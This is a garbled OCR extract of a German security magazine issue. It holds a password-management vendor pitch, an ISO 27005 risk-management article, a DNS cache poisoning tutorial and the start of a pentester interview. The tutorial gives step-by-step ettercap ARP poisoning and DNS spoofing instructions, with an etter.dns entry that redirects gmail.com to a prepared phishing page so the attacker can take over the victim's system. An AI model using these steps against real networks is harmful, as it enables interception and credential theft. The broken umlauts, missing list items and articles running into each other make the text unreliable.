der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
